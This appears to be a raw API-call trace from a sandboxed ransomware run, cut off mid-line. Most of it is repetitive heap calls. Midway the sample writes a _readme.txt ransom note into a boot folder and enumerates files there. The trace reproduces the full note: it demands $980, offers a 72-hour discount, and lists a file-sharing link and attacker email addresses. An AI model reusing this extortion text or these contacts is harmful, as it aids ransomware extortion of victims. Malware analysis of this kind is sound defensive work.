RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.666] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.666] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.667] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.667] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.668] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.668] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.669] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.669] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.670] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.670] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.671] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.671] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.671] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.671] PathFindFileNameW (pszPath="") returned="" [0209.671] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.671] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.672] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.672] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.672] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.672] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.672] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.672] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.672] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0209.672] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.672] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.672] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.673] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.673] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.673] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.673] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.673] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.673] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.673] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.673] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.673] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.674] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.674] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.674] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.674] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.674] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.674] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.674] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.674] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.674] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.674] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, 